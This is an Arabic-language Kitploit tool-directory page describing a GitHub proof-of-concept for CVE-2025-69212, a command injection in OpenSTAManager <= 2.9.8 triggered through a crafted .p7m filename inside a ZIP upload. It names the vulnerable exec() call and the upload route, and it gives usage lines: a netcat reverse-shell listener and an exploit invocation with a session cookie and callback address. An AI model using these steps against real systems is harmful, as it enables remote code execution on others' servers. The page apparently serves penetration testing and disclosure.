Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-69212-PoC — برهان مفهوم لاستغلال ثغرة CVE-2025-69212: حقن أوامر في نظام التشغيل في OpenSTAManager <= 2.9.8 عبر اسم ملف .p7m خبيث في تحميل ZIP، مما يتيح تنفيذ تعليمات برمجية عن بُعد. | Kitploit
أدوات/GitHubGitHub/tohib09/cve-2025-69212-poc
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرة
GitHubtohib09/cve-2025-69212-poc

CVE-2025-69212-PoC

برهان مفهوم لاستغلال ثغرة CVE-2025-69212: حقن أوامر في نظام التشغيل في OpenSTAManager <= 2.9.8 عبر اسم ملف .p7m خبيث في تحميل ZIP، مما يتيح تنفيذ تعليمات برمجية عن بُعد.

عرض المستودع
44منذ 3 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-69212 — OpenSTAManager P7M حقن الأوامر PoC

OpenSTAManager <= 2.9.8 — حقن أوامر النظام عبر اسم ملف .p7m خبيث في تحميل ZIP.

الملف: src/Util/XML.php:100 — $file غير منقى في exec()
الناقل: /plugins/importFE_ZIP/actions.php → ZIP → اسم ملف .p7m → exec("openssl smime ... -in \"$file\" ...")

الاستخدام

# Listener
nc -lvnp 4444

# Exploit
python3 CVE-2025-69212.py http://target.htb YOUR_PHPSESSID 10.10.14.X 4444

المراجع

  • https://github.com/advisories/GHSA-25fp-8w8p-mx36
  • https://nvd.nist.gov/vuln/detail/CVE-2025-69212

CVE-2025-69212-PoC

تنزيل الأداة